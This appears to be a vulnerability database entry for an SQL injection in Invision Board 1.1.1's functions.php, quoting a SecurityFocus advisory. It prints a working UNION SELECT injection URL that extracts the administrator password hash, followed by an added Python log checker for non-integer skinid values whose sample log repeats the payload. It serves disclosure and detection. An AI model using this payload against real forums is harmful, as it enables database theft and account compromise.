Invision Board 1.1.1 – ‘functions.php’ SQL Injection

Vulnerability ID 1053811 Vulnerability type
Published 2003-04-05 Updated 2003-04-05
CVE ID N/A
CNNVD-ID N/A
Platform PHP CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/22461
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability EXP
source: http://www.securityfocus.com/bid/7290/info

An input validation error has been reported in Invision Board which may result in the manipulation of SQL queries. This vulnerability exists in the functions.php script file.

An attacker may be able to exploit this vulnerability by manipulating a URI parameter to include malicious SQL commands and queries, which may result in information disclosure or database corruption.

http://www.example.com/index.php?skinid=99+AND+s.hidden%3D0+UNION+SELECT+s.*%2C+t.template%2C+c.password+FROM+ibf_skins+s+LEFT+JOIN+ibf_templates+t+ON+%28t.tmid%3Ds.tmpl_id%29+LEFT+JOIN+ibf_members+c+ON+%28c.id%3D1%29+WHERE+s.sid%3D1+AND+s.hidden%3D0
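
An added example, not part of the original advisory or of Invision Board's code: a log check that flags requests whose decoded skinid parameter is not a plain integer, which is the input validation the request above bypasses. The log lines, the combined log format and the assumption that skin IDs are short non-negative integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not from the page.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Apr/2003:10:00:01 +0000] "GET /index.php?skinid=2 HTTP/1.0" 200 5120
203.0.113.9 - - [05/Apr/2003:10:00:07 +0000] "GET /index.php?skinid=99+AND+s.hidden%3D0+UNION+SELECT+s.*%2C+t.template HTTP/1.0" 200 7431
203.0.113.5 - - [05/Apr/2003:10:00:09 +0000] "GET /index.php?act=idx HTTP/1.0" 200 4096
203.0.113.7 - - [05/Apr/2003:10:00:12 +0000] "GET /index.php?act=idx&skinid=1%27 HTTP/1.0" 200 4100
"""

# Client address and request target from one combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# Assumption: a legitimate skin ID is a short run of ASCII digits.
SKINID_RE = re.compile(r"[0-9]{1,10}")


def is_valid_skinid(value: str) -> bool:
    """Allow-list check: the whole decoded value must be an integer."""
    return SKINID_RE.fullmatch(value) is not None


def suspicious_skinid_requests(log_text: str):
    """Return (client, decoded skinid) for every request that fails the check."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line this parser understands
        client, uri = match.groups()
        # parse_qs decodes '+' and %XX, so encoded payloads are compared in clear.
        params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
        for value in params.get("skinid", []):
            if not is_valid_skinid(value):
                findings.append((client, value))
    return findings


if __name__ == "__main__":
    for client, value in suspicious_skinid_requests(SAMPLE_LOG):
        print(f"{client}: non-integer skinid {value!r}")
```

The same allow-list test applied on the server before the value reaches any SQL string rejects the request outright.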
